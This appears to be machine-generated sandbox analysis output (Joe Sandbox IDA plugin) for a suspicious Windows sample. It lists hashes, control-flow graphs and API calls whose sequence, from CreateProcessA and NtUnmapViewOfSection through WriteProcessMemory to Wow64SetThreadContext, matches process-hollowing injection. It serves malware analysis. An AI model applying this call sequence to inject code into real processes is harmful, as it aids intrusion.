                                                                                                                                                                            • API String ID: 498011366-0
                                                                                                                                                                            • Opcode ID: b9f3b000e6673f7f4818237357d92547fdfa41012a5ca308a81ae59dd7071356
                                                                                                                                                                            • Instruction ID: 0162f55969443dc40ee8d5345fa3b494dacffa3669e42565e9e8803085e7cb6a
                                                                                                                                                                            • Opcode Fuzzy Hash: b9f3b000e6673f7f4818237357d92547fdfa41012a5ca308a81ae59dd7071356
                                                                                                                                                                            • Instruction Fuzzy Hash: E81156B5D003498FDB20DFAAC845BEEFBF5EF48320F108819D819A7240CB35A940CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: tIh
                                                                                                                                                                            • API String ID: 0-443931868
                                                                                                                                                                            • Opcode ID: cdd85e2b3c1b140a45cd3f61ab2dac5171411dc4d4890a5165880d0e2fab7dde
                                                                                                                                                                            • Instruction ID: 60c742b09176dbeaab7e9401b39408c83b94255dadbe59af20d9de288cea0c2e
                                                                                                                                                                            • Opcode Fuzzy Hash: cdd85e2b3c1b140a45cd3f61ab2dac5171411dc4d4890a5165880d0e2fab7dde
                                                                                                                                                                            • Instruction Fuzzy Hash: 57D132B0E1420ADFCB04CFAAC5848AEFBB6FF99314F109559D416EB254D734AA42CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 07865E85
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SectionUnmapView
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 498011366-0
                                                                                                                                                                            • Opcode ID: 64b2a1f305d96cbc0145992b5d0c309fb0373150385af0c45a5a6cf4012b90ef
                                                                                                                                                                            • Instruction ID: bdb76324a51047a197861dc5401ecaa9e38b761a185dfdd89d0b216170578432
                                                                                                                                                                            • Opcode Fuzzy Hash: 64b2a1f305d96cbc0145992b5d0c309fb0373150385af0c45a5a6cf4012b90ef
                                                                                                                                                                            • Instruction Fuzzy Hash: 001146B5D003498FDB20DFAAC845BDEFBF5EB48320F108419D519A7240CA35A944CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: )"
                                                                                                                                                                            • API String ID: 0-4237191880
                                                                                                                                                                            • Opcode ID: 07d39f94835e29677c8fe16c467a105928cc9c99d2cb8d6097d673d06f772255
                                                                                                                                                                            • Instruction ID: 0890fce963947a357443abca05e04a48acab689bde77ad708f1233ded54f024a
                                                                                                                                                                            • Opcode Fuzzy Hash: 07d39f94835e29677c8fe16c467a105928cc9c99d2cb8d6097d673d06f772255
                                                                                                                                                                            • Instruction Fuzzy Hash: B781D5B4E002099FDB08CFAAC9846EEFBB2FF89314F14902AD515AB358D7359946CF54
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 10bfdd5cc443791b964b1b4fff4cd33f68e6ca384baa12992974da01e93071d3
                                                                                                                                                                            • Instruction ID: 176c14ba56a54a0fdd149bb633cfaf5671fc200bbebb589e2b22cef7b733bee2
                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2323 78da200-78da21e 2324 78da225-78da22d call 78da2f8 2323->2324 2325 78da220 2323->2325 2326 78da233 2324->2326 2325->2324 2327 78da23a-78da256 2326->2327 2328 78da25f-78da260 2327->2328 2329 78da258 2327->2329 2330 78da2cd-78da2d1 2328->2330 2329->2326 2329->2328 2329->2330 2331 78da2a6-78da2c8 2329->2331 2332 78da262-78da276 2329->2332 2331->2327 2334 78da289-78da290 2332->2334 2335 78da278-78da287 2332->2335 2336 78da297-78da2a4 2334->2336 2335->2336 2336->2327
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 3H5$3H5
                                                                                                                                                                            • API String ID: 0-2752242361
                                                                                                                                                                            • Opcode ID: 5f70a55babc04e2c0ffaa7e23855e5b88e2f96779661bdbf5e55b52242e83d18
                                                                                                                                                                            • Instruction ID: e715d5212ccc53a72ab736d5711343db945563e95db978cf1f874dad59cab5dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f70a55babc04e2c0ffaa7e23855e5b88e2f96779661bdbf5e55b52242e83d18
                                                                                                                                                                            • Instruction Fuzzy Hash: 962107B4D10209DFDB48DFAAC540AAEFBF1BF99200F24C56A9508A7214E7319E45CB42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2448 78662cc-786636d 2450 78663a6-78663c6 2448->2450 2451 786636f-7866379 2448->2451 2456 78663ff-786642e 2450->2456 2457 78663c8-78663d2 2450->2457 2451->2450 2452 786637b-786637d 2451->2452 2454 78663a0-78663a3 2452->2454 2455 786637f-7866389 2452->2455 2454->2450 2458 786638d-786639c 2455->2458 2459 786638b 2455->2459 2467 7866467-7866521 CreateProcessA 2456->2467 2468 7866430-786643a 2456->2468 2457->2456 2461 78663d4-78663d6 2457->2461 2458->2458 2460 786639e 2458->2460 2459->2458 2460->2454 2462 78663d8-78663e2 2461->2462 2463 78663f9-78663fc 2461->2463 2465 78663e6-78663f5 2462->2465 2466 78663e4 2462->2466 2463->2456 2465->2465 2470 78663f7 2465->2470 2466->2465 2479 7866523-7866529 2467->2479 2480 786652a-78665b0 2467->2480 2468->2467 2469 786643c-786643e 2468->2469 2471 7866440-786644a 2469->2471 2472 7866461-7866464 2469->2472 2470->2463 2474 786644e-786645d 2471->2474 2475 786644c 2471->2475 2472->2467 2474->2474 2476 786645f 2474->2476 2475->2474 2476->2472 2479->2480 2490 78665b2-78665b6 2480->2490 2491 78665c0-78665c4 2480->2491 2490->2491 2492 78665b8 2490->2492 2493 78665c6-78665ca 2491->2493 2494 78665d4-78665d8 2491->2494 2492->2491 2493->2494 2495 78665cc 2493->2495 2496 78665da-78665de 2494->2496 2497 78665e8-78665ec 2494->2497 2495->2494 2496->2497 2500 78665e0 2496->2500 2498 78665fe-7866605 2497->2498 2499 78665ee-78665f4 2497->2499 2501 7866607-7866616 2498->2501 2502 786661c 2498->2502 2499->2498 2500->2497 2501->2502 2504 786661d 2502->2504 2504->2504
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786650E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                            • Opcode ID: ae0c70172b200c48deac8fba90702056e0a31ddc9855a148e464f94ac5c57dad
                                                                                                                                                                            • Instruction ID: bce60cbcc0a155992fe44f7af4c2eeacba400c533f83da18efed5630be108d81
                                                                                                                                                                            • Opcode Fuzzy Hash: ae0c70172b200c48deac8fba90702056e0a31ddc9855a148e464f94ac5c57dad
                                                                                                                                                                            • Instruction Fuzzy Hash: 82A14AB1E0025ADFEB20CF68C845BEDBBB2AF58314F148169D808E7244EB759985CF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786650E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                            • Opcode ID: 69461f5ae42c196154289dbf875a50d85ac6b16db67e74b2cea546f6ecec9a7e
                                                                                                                                                                            • Instruction ID: d2760e08e16ee8d2ebfaf07b12f082a21cbd6331354aa61c86e05704c87627be
                                                                                                                                                                            • Opcode Fuzzy Hash: 69461f5ae42c196154289dbf875a50d85ac6b16db67e74b2cea546f6ecec9a7e
                                                                                                                                                                            • Instruction Fuzzy Hash: FF9149B1E0025ADFEB20CF68C845BEDBBB2EF48314F148169D808E7244EB759985CF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018BBF1E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            • Opcode ID: 7d432739e1228fd7e607134a01b9972a0f700e35b743f9f66f8afb8ccba4fa65
                                                                                                                                                                            • Instruction ID: d23667e594cd72eaeead6d68bab7d4f5e961fa1254fb98bf0c040482667531dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 7d432739e1228fd7e607134a01b9972a0f700e35b743f9f66f8afb8ccba4fa65
                                                                                                                                                                            • Instruction Fuzzy Hash: EB814470A00B058FDB24CF29D48479ABBF1FF88310F04892DE586CBB50D775EA498B91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057C2922
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                            • Opcode ID: f9b57ef4b3863ddacf2941d090e266bc736c3768bce17f57cd2278ad023aa836
                                                                                                                                                                            • Instruction ID: dda93c7c71b32f8548ae2b72fd85c288345575997e6100acbd62b51c2fb6776a
                                                                                                                                                                            • Opcode Fuzzy Hash: f9b57ef4b3863ddacf2941d090e266bc736c3768bce17f57cd2278ad023aa836
                                                                                                                                                                            • Instruction Fuzzy Hash: 86510FB5C00249AFCF15CF99C984ADDBFB2FF49310F54816AE818AB221C775A941DF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057C2922
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                            • Opcode ID: 9bc31b3ff3f80d5dbcb26a967c3e3d683effb9f6ec764d87ffb1f9a6cf3a854e
                                                                                                                                                                            • Instruction ID: 50394d701d605d56e5bf5042912ce1667e4dea6a9571defc9f519d52240f9b96
                                                                                                                                                                            • Opcode Fuzzy Hash: 9bc31b3ff3f80d5dbcb26a967c3e3d683effb9f6ec764d87ffb1f9a6cf3a854e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4351ABB5D003499BDB14CF9AC884ADEBBB5BF48310F64812EE819AB211D775A841CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 018B5DC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 8f4c3f173b5678376b5e4867aec0ae1f1e64133f6ce2d7509c0b04da19ec1d71
                                                                                                                                                                            • Instruction ID: 3484ece15b63ceb5c58450aa32da313d26990b88a9f72212270f56b34ed8d199
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f4c3f173b5678376b5e4867aec0ae1f1e64133f6ce2d7509c0b04da19ec1d71
                                                                                                                                                                            • Instruction Fuzzy Hash: AA41BFB1C0071DCBEB24DFA9C885BDDBBB5BF48314F20816AD508AB251DB756A46CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 018B5DC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 022d067b5af944841cd7d796268bf795cd1caf2e8d81703678fc772b5a209975
                                                                                                                                                                            • Instruction ID: 9557f9fb450f047afbe2870305153fa9e50d4389abadaa67756ce8ccd5bb7c66
                                                                                                                                                                            • Opcode Fuzzy Hash: 022d067b5af944841cd7d796268bf795cd1caf2e8d81703678fc772b5a209975
                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41D0B1C00719CBEB24DFA9C885BDDBBB1FF48314F20816AD508AB251DB756A46CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 2692 57c1dc4-57c4e1c 2696 57c4ecc-57c4eec call 57c1c9c 2692->2696 2697 57c4e22-57c4e27 2692->2697 2704 57c4eef-57c4efc 2696->2704 2699 57c4e29-57c4e60 2697->2699 2700 57c4e7a-57c4eb2 CallWindowProcW 2697->2700 2706 57c4e69-57c4e78 2699->2706 2707 57c4e62-57c4e68 2699->2707 2701 57c4ebb-57c4eca 2700->2701 2702 57c4eb4-57c4eba 2700->2702 2701->2704 2702->2701 2706->2704 2707->2706
                                                                                                                                                                            APIs
                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 057C4EA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                                                            • Opcode ID: fb0928c344a163e2e1eb6a98cf785ddf725e0b45f382c5f6461b7a3f6ba7407e
                                                                                                                                                                            • Instruction ID: 5028aa6fbaf1c0b4ff15231aea96ca0100cc17f6c814c30c843fb320a23b57e9
                                                                                                                                                                            • Opcode Fuzzy Hash: fb0928c344a163e2e1eb6a98cf785ddf725e0b45f382c5f6461b7a3f6ba7407e
                                                                                                                                                                            • Instruction Fuzzy Hash: C63137B4900309CFDB10DF89C449BAABFF6FB89325F25849DD419A7211C335A841CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 2710 7865c49-7865c9e 2713 7865ca0-7865cac 2710->2713 2714 7865cae-7865ced WriteProcessMemory 2710->2714 2713->2714 2716 7865cf6-7865d26 2714->2716 2717 7865cef-7865cf5 2714->2717 2717->2716
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07865CE0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: 513bfc867171311e34693127fa7b208182386a53be5bc3124afb4bb21b31f753
                                                                                                                                                                            • Instruction ID: 39852165702dde077ba71a0d247356677bcbe6c3c0710b7727239bc94443bf11
                                                                                                                                                                            • Opcode Fuzzy Hash: 513bfc867171311e34693127fa7b208182386a53be5bc3124afb4bb21b31f753
                                                                                                                                                                            • Instruction Fuzzy Hash: C02148B1D0031A9FDB10CFA9C885BEEBBF5FF48320F108429E959A7240C7789954CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 2721 7865c50-7865c9e 2723 7865ca0-7865cac 2721->2723 2724 7865cae-7865ced WriteProcessMemory 2721->2724 2723->2724 2726 7865cf6-7865d26 2724->2726 2727 7865cef-7865cf5 2724->2727 2727->2726
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07865CE0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: e908830fb19b5e59d1bde79846b3c3b7431af7a06bc095ae70e7e10469d92149
                                                                                                                                                                            • Instruction ID: 652c43bbe58e538686de269dc6f1acfb9e4e2d0c5f69b0d86641dc4317472d16
                                                                                                                                                                            • Opcode Fuzzy Hash: e908830fb19b5e59d1bde79846b3c3b7431af7a06bc095ae70e7e10469d92149
                                                                                                                                                                            • Instruction Fuzzy Hash: C32139B1D003499FDB10DFA9C885BDEBBF5FF48320F508429E919A7240C7789954CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 2731 18be1a0-18be1a6 2732 18be1a8-18be1ac 2731->2732 2733 18be1ad-18be23c DuplicateHandle 2731->2733 2732->2733 2734 18be23e-18be244 2733->2734 2735 18be245-18be262 2733->2735 2734->2735
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018BE16E,?,?,?,?,?), ref: 018BE22F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: 6204e658171ce9788b74ad120c87a4e1baf20bd5058de9361c676204ffa40959
                                                                                                                                                                            • Instruction ID: af53eef2195b13789b63487bd14ce38c111f10b2112f15dfa938f950da4345a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 6204e658171ce9788b74ad120c87a4e1baf20bd5058de9361c676204ffa40959
                                                                                                                                                                            • Instruction Fuzzy Hash: A221E5B5D002499FDB10CF9AD885ADEBBF9EB48320F14841AE915A3350D774AA45CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07865DC0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                            • Opcode ID: 931907ab0f55b5f340c94e9072061e760bae6f33540698421717eb4e713dcd58
                                                                                                                                                                            • Instruction ID: d8186f602a1a1c4859da8f5b2cb3e3871e23273620995738ada48b55dfd26393
                                                                                                                                                                            • Opcode Fuzzy Hash: 931907ab0f55b5f340c94e9072061e760bae6f33540698421717eb4e713dcd58
                                                                                                                                                                            • Instruction Fuzzy Hash: 372139B1D003499FDB10CFA9C884BEEBBF5FF48310F50852AE559A7240CB359511CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018BE16E,?,?,?,?,?), ref: 018BE22F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: f1955271dfc700bb0b9c3740e1e8f70dabaad59cfbbcd2be3c2f025704579ede
                                                                                                                                                                            • Instruction ID: 735029271dda978dd87f4c396ff791491649f8f0aef9157667cf9b461832fd29
                                                                                                                                                                            • Opcode Fuzzy Hash: f1955271dfc700bb0b9c3740e1e8f70dabaad59cfbbcd2be3c2f025704579ede
                                                                                                                                                                            • Instruction Fuzzy Hash: 0321E5B5D0024D9FDB10CF9AD885AEEBBF4FB48310F14841AE918A7350D375A944CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07865B36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                            • Opcode ID: 122a6a4ef52f4b67af73adb56d31f2cf834610928f276f64a60b5c3b42ce8e29
                                                                                                                                                                            • Instruction ID: e2ad8766e5324617ccb786d6feff33a636a59c4701c4db2b031eb0631b8a7f80
                                                                                                                                                                            • Opcode Fuzzy Hash: 122a6a4ef52f4b67af73adb56d31f2cf834610928f276f64a60b5c3b42ce8e29
                                                                                                                                                                            • Instruction Fuzzy Hash: 20213AB1D003099FDB24DFA9C4857EEBBF5EF88320F548429D419A7240CB789945CF55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07865DC0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07865B36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07865BFE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
